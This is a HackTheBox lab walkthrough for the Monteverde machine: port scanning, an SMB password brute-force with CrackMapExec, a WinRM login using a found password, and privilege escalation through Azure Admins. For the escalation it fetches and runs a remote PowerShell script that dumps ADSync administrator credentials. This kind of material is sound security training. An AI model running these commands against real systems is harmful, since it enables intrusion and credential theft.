7. HackTheBox. Level Medium: Monteverde Passage. SMB and LPE Brute via Azure Admins

10 December 2024 3 minutes Author: Lady Liberty

Learn how to hack a Monteverde machine on HackTheBox: port scanning, brute-forcing SMB, using the Azure Admins group to elevate privileges, and gaining admin access.

How to pass HackTheBox Monteverde

In this article, we will set the SMB password and elevate privileges to administrator level using an account that is a member of the Azure Admins group.

The lab is connected via VPN. It is recommended to avoid using your work computer or devices that store sensitive data, as you will be on a private network with other users who have cybersecurity expertise.

Recon

This machine has an IP address of 10.10.10.172, which I add to /etc/hosts.

10.10.10.172    monteverde.htb

First, a scan is performed for open ports. To save time, the initial scan is performed using masscan, as it takes longer to scan all ports with nmap.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.172   --rate=500

There are many ports open on the host. Now let’s scan them with nmap to filter and select the ones we need.

nmap monteverde.htb -p49778,88,593,49667,53,445,5985,49675,9389,3268,49706,389,464,49674,139,636,135,3269,49673

Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.

nmap -A monteverde.htb -p88,593,53,445,5985,9389,3268,389,464,139,636,135,3269

First of all, we check SMB. We will do this using enum4linux. This way we will get the users, as well as their group membership.

enum4linux -a monteverde.htb

USER

As usual, password brute-force is performed in parallel during the entry point search process. Given that the password policy requires a minimum password length of 7 characters, appropriate lists are created for selection.

Now let’s run the brute using CrackMapExec.

cme smb monteverde.htb -u ./users.txt -p ./passwords.txt

Surprisingly, this worked – the user’s credentials were found. Now the resources available to this user are checked.

cme smb monteverde.htb -u SABatchJobs -p SABatchJobs --shares

Let’s turn to the users$ resource.

smbclient -U SABatchJobs%SABatchJobs //10.10.10.172/users$

Let’s recursively look at all the files on the server.

And let’s see what’s in the file.

Now we connect to WinRM and remove the user flag.

evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'

ROOT

We are checking the user account information.

It consists of the Azure Admins group — this is the LPE vector. We use Azure-ADConnect to connect to the Azure database. We download the script from the local server to the remote machine and execute it.

IEX (New-Object Net.WebClient).DownloadString('http://10.10.15.60/Azure-ADConnect.ps1')
Azure-ADConnect -server 127.0.0.1 -db ADSync

We get the administrator credentials. We connect and pick up the flag.

Full access to the system is provided.

Conclusion

By going through a Monteverde machine on HackTheBox, it was demonstrated how practical cybersecurity skills help to find vulnerabilities and gain control over the system. Step by step, port scanning, password selection, access rights analysis and elevation of privileges to the administrator level were performed.

This process emphasizes the importance of knowledge in working with network protocols, account vulnerabilities and the specifics of integration with Azure. For cybersecurity professionals, this is not only a training in technical skills, but also an important lesson in the value of protecting their systems from such attacks.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.